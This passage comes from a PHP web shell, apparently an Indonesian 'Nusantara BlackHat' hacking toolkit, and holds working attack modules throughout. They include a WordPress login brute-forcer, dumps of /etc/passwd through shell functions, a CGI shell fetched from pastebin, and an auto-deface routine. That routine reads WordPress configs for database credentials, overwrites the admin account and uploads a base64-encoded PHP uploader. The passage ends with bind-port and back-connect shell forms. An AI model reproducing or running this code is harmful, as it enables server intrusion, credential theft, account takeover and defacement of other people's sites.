  1633.             curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
  1634.             $exec = curl_exec($curl);
  1635.             $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
  1636.             $this->cool();
  1637.             if($http == 302) {
  1638.                  echo "<font color='green'> <br/>[+] Success [+] Tinggal Login Aja</font><br>";
  1639.                  break;
  1640.             } else {
  1641.                 echo "<font color='red'><br/>[+] Failed</font><br>";
  1642.             }
  1643.                 curl_close($curl);
  1644.         }
  1645. }
  1646.  
  1647. $wp = new lugi();
  1648. $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
  1649. $wp->banner();
  1650. $wp->extract_post();
  1651. $wp->Xregex();
  1652. $wp->brute();
  1653.        
  1654. echo "<br>";
  1655.  
  1656.  
  1657. }
  1658.  
  1659.  
  1660. ////////////////////////////
  1661. elseif($_GET['do'] == 'csrf') {
  1662. ?>      <html>
  1663. <title>CSRF EXPLOITER ONLINE</title>
  1664. <center><br><br><h2> CSRF ONLINE</h2>
  1665. <br><br>
  1666. <font color=lime>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
  1667. <center>
  1668. <form method="post">
  1669. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1670. POST File: <input type="text" name="data" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  1671. <input type="submit" name="go" value="Lock!">
  1672. </form>
  1673. <?php
  1674. $url = $_POST['url'];
  1675. $data = $_POST['data'];
  1676. $submit = $_POST['go'];
  1677. if($submit) {
  1678.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input type='submit' name='ok' value='Upload'></form";
  1679. }
  1680. ?>
  1681. </form>
  1682. </html>
  1683. <?php
  1684.  
  1685. }
  1686.  
  1687.  /////////////
  1688.  elseif ($_GET['do'] == 'hashid'){
  1689. if(isset($_POST['gethash'])){
  1690.         $hash = $_POST['hash'];
  1691.         if(strlen($hash)==32){
  1692.             $hashresult = "MD5 Hash";
  1693.         }elseif(strlen($hash)==40){
  1694.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  1695.         }elseif(strlen($hash)==13){
  1696.             $hashresult = "DES(Unix) Hash";
  1697.         }elseif(strlen($hash)==16){
  1698.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  1699.         }elseif(strlen($hash)==41){
  1700.             $GetHashChar = substr($hash, 40);
  1701.             if($GetHashChar == "*"){
  1702.                 $hashresult = "MySQL5 Hash";
  1703.             }  
  1704.         }elseif(strlen($hash)==64){
  1705.             $hashresult = "SHA-256 Hash";
  1706.         }elseif(strlen($hash)==96){
  1707.             $hashresult = "SHA-384 Hash";
  1708.         }elseif(strlen($hash)==128){
  1709.             $hashresult = "SHA-512 Hash";
  1710.         }elseif(strlen($hash)==34){
  1711.             if(strstr($hash, '$1$')){
  1712.                 $hashresult = "MD5(Unix) Hash";
  1713.             }  
  1714.         }elseif(strlen($hash)==37){
  1715.             if(strstr($hash, '$apr1$')){
  1716.                 $hashresult = "MD5(APR) Hash";
  1717.             }  
  1718.         }elseif(strlen($hash)==34){
  1719.             if(strstr($hash, '$H$')){
  1720.                 $hashresult = "MD5(phpBB3) Hash";
  1721.             }  
  1722.         }elseif(strlen($hash)==34){
  1723.             if(strstr($hash, '$P$')){
  1724.                 $hashresult = "MD5(Wordpress) Hash";
  1725.             }  
  1726.         }elseif(strlen($hash)==39){
  1727.             if(strstr($hash, '$5$')){
  1728.                 $hashresult = "SHA-256(Unix) Hash";
  1729.             }  
  1730.         }elseif(strlen($hash)==39){
  1731.             if(strstr($hash, '$6$')){
  1732.                 $hashresult = "SHA-512(Unix) Hash";
  1733.             }  
  1734.         }elseif(strlen($hash)==24){
  1735.             if(strstr($hash, '==')){
  1736.                 $hashresult = "MD5(Base-64) Hash";
  1737.             }  
  1738.         }else{
  1739.             $hashresult = "Hash type not found";
  1740.         }
  1741.     }else{
  1742.         $hashresult = "Not Hash Entered";
  1743.     }
  1744.    
  1745.     ?>
  1746.     <center><br><Br><br>
  1747.    
  1748.         <form action="" method="POST">
  1749.         <tr>
  1750.         <table class="tabnet">
  1751.         <th colspan="5">Hash Identification</th>
  1752.         <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>  <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  1753.         <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  1754.     </table></tr></form>
  1755.     </center>
  1756.    
  1757.     <?php
  1758.  }
  1759.  
  1760.  ///////////////////////
  1761.  elseif($_GET['do'] == 'passwbypass') {
  1762.     echo '<center>Bypass etc/passw With:<br>
  1763. <table style="width:50%">
  1764.  <tr>
  1765.    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  1766.    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  1767.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  1768.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  1769.    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  1770. </tr></table>Bypass User With : <table style="width:50%">
  1771. <tr>
  1772.    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  1773.    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  1774.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  1775.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  1776.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  1777. </tr>
  1778. </table><br>';
  1779.  
  1780.  
  1781. if ($_POST['awkuser']) {
  1782. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1783. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  1784. echo "</textarea><br>";
  1785. }
  1786. if ($_POST['systuser']) {
  1787. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1788. echo system("ls /var/mail");
  1789. echo "</textarea><br>";
  1790. }
  1791. if ($_POST['passthuser']) {
  1792. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1793. echo passthru("ls /var/mail");
  1794. echo "</textarea><br>";
  1795. }
  1796. if ($_POST['exuser']) {
  1797. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1798. echo exec("ls /var/mail");
  1799. echo "</textarea><br>";
  1800. }
  1801. if ($_POST['shexuser']) {
  1802. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1803. echo shell_exec("ls /var/mail");
  1804. echo "</textarea><br>";
  1805. }
  1806. if($_POST['syst'])
  1807. {
  1808. echo"<textarea class='inputz' cols='65' rows='15'>";
  1809. echo system("cat /etc/passwd");
  1810. echo"</textarea><br><br><b></b><br>";
  1811. }
  1812. if($_POST['passth'])
  1813. {
  1814. echo"<textarea class='inputz' cols='65' rows='15'>";
  1815. echo passthru("cat /etc/passwd");
  1816. echo"</textarea><br><br><b></b><br>";
  1817. }
  1818. if($_POST['ex'])
  1819. {
  1820. echo"<textarea class='inputz' cols='65' rows='15'>";
  1821. echo exec("cat /etc/passwd");
  1822. echo"</textarea><br><br><b></b><br>";
  1823. }
  1824. if($_POST['shex'])
  1825. {
  1826. echo"<textarea class='inputz' cols='65' rows='15'>";
  1827. echo shell_exec("cat /etc/passwd");
  1828. echo"</textarea><br><br><b></b><br>";
  1829. }
  1830. echo '<center>';
  1831. if($_POST['melex'])
  1832. {
  1833. echo"<textarea class='inputz' cols='65' rows='15'>";
  1834. for($uid=0;$uid<60000;$uid++){
  1835. $ara = posix_getpwuid($uid);
  1836. if (!empty($ara)) {
  1837. while (list ($key, $val) = each($ara)){
  1838. print "$val:";
  1839. }
  1840. print "n";
  1841. }
  1842. }
  1843. echo"</textarea><br><br>";
  1844. }
  1845. }
  1846. /////////////////////////////
  1847. elseif($_GET['do'] == 'cgi') {
  1848.     $cgi_dir = mkdir('idx_cgi', 0755);
  1849.     $file_cgi = "idx_cgi/cgi.izo";
  1850.     $isi_htcgi = "AddHandler cgi-script .izo";
  1851.     $htcgi = fopen(".htaccess", "w");
  1852.     fwrite($htcgi, $isi_htcgi);
  1853.     fclose($htcgi);
  1854.     $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
  1855.     $cgi = fopen($file_cgi, "w");
  1856.     fwrite($cgi, $cgi_script);
  1857.     fclose($cgi);
  1858.     chmod($file_cgi, 0755);
  1859.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1860. } elseif($_GET['do'] == 'fake_root') {
  1861.     ob_start();
  1862.     $cwd = getcwd();
  1863.     $ambil_user = explode("/", $cwd);
  1864.     $user = $ambil_user[2];
  1865.     if($_POST['reverse']) {
  1866.         $site = explode("rn", $_POST['url']);
  1867.         $file = $_POST['file'];
  1868.         foreach($site as $url) {
  1869.             $cek = getsource("$url/~$user/$file");
  1870.             if(preg_match("/hacked/i", $cek)) {
  1871.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1872.             }
  1873.         }
  1874.     } else {
  1875.         echo "<center><form method='post'>
  1876.        Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1877.        User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1878.        Domain: <br>
  1879.        <textarea style='width: 450px; height: 250px;' name='url'>";
  1880.         reverse($_SERVER['HTTP_HOST']);
  1881.         echo "</textarea><br>
  1882.        <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1883.        </form><br>
  1884.        NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1885.     }
  1886. } elseif($_GET['do'] == 'adminer') {
  1887.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1888.     function adminer($url, $isi) {
  1889.         $fp = fopen($isi, "w");
  1890.         $ch = curl_init();
  1891.               curl_setopt($ch, CURLOPT_URL, $url);
  1892.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1893.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1894.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1895.               curl_setopt($ch, CURLOPT_FILE, $fp);
  1896.         return curl_exec($ch);
  1897.               curl_close($ch);
  1898.         fclose($fp);
  1899.         ob_flush();
  1900.         flush();
  1901.     }
  1902.     if(file_exists('adminer.php')) {
  1903.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1904.     } else {
  1905.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1906.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1907.         } else {
  1908.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  1909.         }
  1910.     }
  1911. } elseif($_GET['do'] == 'auto_dwp') {
  1912.     if($_POST['auto_deface_wp']) {
  1913.         function anucurl($sites) {
  1914.             $ch = curl_init($sites);
  1915.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1916.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1917.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1918.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1919.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1920.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1921.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1922.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1923.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1924.             $data = curl_exec($ch);
  1925.                   curl_close($ch);
  1926.             return $data;
  1927.         }
  1928.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1929.             $post = array(
  1930.                    "log" => "$userr",
  1931.                    "pwd" => "$pass",
  1932.                    "rememberme" => "forever",
  1933.                    "wp-submit" => "$wp_submit",
  1934.                    "redirect_to" => "$web",
  1935.                    "testcookie" => "1",
  1936.                    );
  1937.             $ch = curl_init($cek);
  1938.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1939.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1940.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1941.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1942.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1943.                   curl_setopt($ch, CURLOPT_POST, 1);
  1944.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1945.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1946.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1947.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1948.             $data = curl_exec($ch);
  1949.                   curl_close($ch);
  1950.             return $data;
  1951.         }
  1952.         $scan = $_POST['link_config'];
  1953.         $link_config = scandir($scan);
  1954.         $script = htmlspecialchars($_POST['script']);
  1955.         $user = "nusantarablackhat";
  1956.         $pass = "nusantarablackhat";
  1957.         $passx = md5($pass);
  1958.         foreach($link_config as $dir_config) {
  1959.             if(!is_file("$scan/$dir_config")) continue;
  1960.             $config = file_get_contents("$scan/$dir_config");
  1961.             if(preg_match("/WordPress/", $config)) {
  1962.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  1963.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  1964.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1965.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  1966.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1967.                 $prefix = $dbprefix."users";
  1968.                 $option = $dbprefix."options";
  1969.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1970.                 $db = mysql_select_db($dbname);
  1971.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1972.                 $result = mysql_fetch_array($q);
  1973.                 $id = $result[ID];
  1974.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1975.                 $result2 = mysql_fetch_array($q2);
  1976.                 $target = $result2[option_value];
  1977.                 if($target == '') {                
  1978.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1979.                 } else {
  1980.                     echo "[+] $target <br>";
  1981.                 }
  1982.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1983.                 if(!$conn OR !$db OR !$update) {
  1984.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1985.                     mysql_close($conn);
  1986.                 } else {
  1987.                     $site = "$target/wp-login.php";
  1988.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  1989.                     $b1 = anucurl($site2);
  1990.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1991.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1992.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1993.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1994.                     $www = "m.php";
  1995.                     $fp5 = fopen($www,"w");
  1996.                     fputs($fp5,$upload3);
  1997.                     $post2 = array(
  1998.                             "_wpnonce" => "$anu2",
  1999.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2000.                             "themezip" => "@$www",
  2001.                             "install-theme-submit" => "Install Now",
  2002.                             );
  2003.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2004.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2005.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2006.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2007.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2008.                           curl_setopt($ch, CURLOPT_POST, 1);
  2009.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2010.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2011.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2012.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2013.                     $data3 = curl_exec($ch);
  2014.                           curl_close($ch);
  2015.                     $y = date("Y");
  2016.                     $m = date("m");
  2017.                     $namafile = "id.php";
  2018.                     $fpi = fopen($namafile,"w");
  2019.                     fputs($fpi,$script);
  2020.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2021.                            curl_setopt($ch6, CURLOPT_POST, true);
  2022.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2023.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2024.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2025.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2026.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2027.                     $postResult = curl_exec($ch6);
  2028.                            curl_close($ch6);
  2029.                     $as = "$target/k.php";
  2030.                     $bs = anucurl($as);
  2031.                     if(preg_match("#$script#is", $bs)) {
  2032.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  2033.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2034.                         } else {
  2035.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  2036.                         echo "[!!] coba aja manual: <br>";
  2037.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2038.                         echo "[+] username: <font color=lime>$user</font><br>";
  2039.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  2040.                         }
  2041.                     mysql_close($conn);
  2042.                 }
  2043.             }
  2044.         }
  2045.     } else {
  2046.         echo "<center><h1>WordPress Auto Deface</h1>
  2047.        <form method='post'>
  2048.        <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2049.        <input type='text' name='script' height='10' size='50' placeholder='Hacked by Nusantara BlackHat' required><br>
  2050.        <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2051.        </form>
  2052.        <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2053.        </center>";
  2054.     }
  2055. } elseif($_GET['do'] == 'auto_dwp2') {
  2056.     if($_POST['auto_deface_wp']) {
  2057.         function anucurl($sites) {
  2058.             $ch = curl_init($sites);
  2059.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2060.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2061.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2062.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2063.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2064.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2065.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2066.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2067.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2068.             $data = curl_exec($ch);
  2069.                   curl_close($ch);
  2070.             return $data;
  2071.         }
  2072.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2073.             $post = array(
  2074.                    "log" => "$userr",
  2075.                    "pwd" => "$pass",
  2076.                    "rememberme" => "forever",
  2077.                    "wp-submit" => "$wp_submit",
  2078.                    "redirect_to" => "$web",
  2079.                    "testcookie" => "1",
  2080.                    );
  2081.             $ch = curl_init($cek);
  2082.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2083.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2084.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2085.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2086.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2087.                   curl_setopt($ch, CURLOPT_POST, 1);
  2088.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2089.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2090.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2091.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2092.             $data = curl_exec($ch);
  2093.                   curl_close($ch);
  2094.             return $data;
  2095.         }
  2096.         $link = explode("\r\n", $_POST['link']);
  2097.         $script = htmlspecialchars($_POST['script']);
  2098.         $user = "nusantarablackhat";
  2099.         $pass = "nusantarablackhat";
  2100.         $passx = md5($pass);
  2101.         foreach($link as $dir_config) {
  2102.             $config = anucurl($dir_config);
  2103.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  2104.             $dbuser = ambilkata($config,"DB_USER', '","'");
  2105.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2106.             $dbname = ambilkata($config,"DB_NAME', '","'");
  2107.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2108.             $prefix = $dbprefix."users";
  2109.             $option = $dbprefix."options";
  2110.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2111.             $db = mysql_select_db($dbname);
  2112.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2113.             $result = mysql_fetch_array($q);
  2114.             $id = $result[ID];
  2115.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2116.             $result2 = mysql_fetch_array($q2);
  2117.             $target = $result2[option_value];
  2118.             if($target == '') {                
  2119.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2120.             } else {
  2121.                 echo "[+] $target <br>";
  2122.             }
  2123.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2124.             if(!$conn OR !$db OR !$update) {
  2125.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2126.                 mysql_close($conn);
  2127.             } else {
  2128.                 $site = "$target/wp-login.php";
  2129.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  2130.                 $b1 = anucurl($site2);
  2131.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2132.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2133.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2134.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2135.                 $www = "m.php";
  2136.                 $fp5 = fopen($www,"w");
  2137.                 fputs($fp5,$upload3);
  2138.                 $post2 = array(
  2139.                         "_wpnonce" => "$anu2",
  2140.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2141.                         "themezip" => "@$www",
  2142.                         "install-theme-submit" => "Install Now",
  2143.                         );
  2144.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2145.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2146.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2147.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2148.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2149.                       curl_setopt($ch, CURLOPT_POST, 1);
  2150.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2151.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2152.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2153.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2154.                 $data3 = curl_exec($ch);
  2155.                       curl_close($ch);
  2156.                 $y = date("Y");
  2157.                 $m = date("m");
  2158.                 $namafile = "id.php";
  2159.                 $fpi = fopen($namafile,"w");
  2160.                 fputs($fpi,$script);
  2161.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2162.                        curl_setopt($ch6, CURLOPT_POST, true);
  2163.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2164.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2165.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2166.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2167.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  2168.                 $postResult = curl_exec($ch6);
  2169.                        curl_close($ch6);
  2170.                 $as = "$target/k.php";
  2171.                 $bs = anucurl($as);
  2172.                 if(preg_match("#$script#is", $bs)) {
  2173.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  2174.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2175.                     } else {
  2176.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
  2177.                     echo "[!!] coba aja manual: <br>";
  2178.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2179.                     echo "[+] username: <font color=lime>$user</font><br>";
  2180.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  2181.                     }
  2182.                 mysql_close($conn);
  2183.             }
  2184.         }
  2185.     } else {
  2186.         echo "<center><h1>WordPress Auto Deface V.2</h1>
  2187.        <form method='post'>
  2188.        Link Config: <br>
  2189.        <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  2190.        <input type='text' name='script' height='10' size='50' placeholder='Hacked by Nusantara BlackHat' required><br>
  2191.        <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2192.        </form></center>";
  2193.     }
  2194. } elseif($_GET['do'] == 'network') {
  2195.     echo "<form method='post'>
  2196.    <u>Bind Port:</u> <br>
  2197.    PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  2198.    <input type='submit' name='sub_bp' value='>>'>
  2199.    </form>
  2200.    <form method='post'>
  2201.    <u>Back Connect:</u> <br>
  2202.    Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  2203.    PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  2204.    <input type='submit' name='sub_bc' value='>>'>
  2205.    </form>";
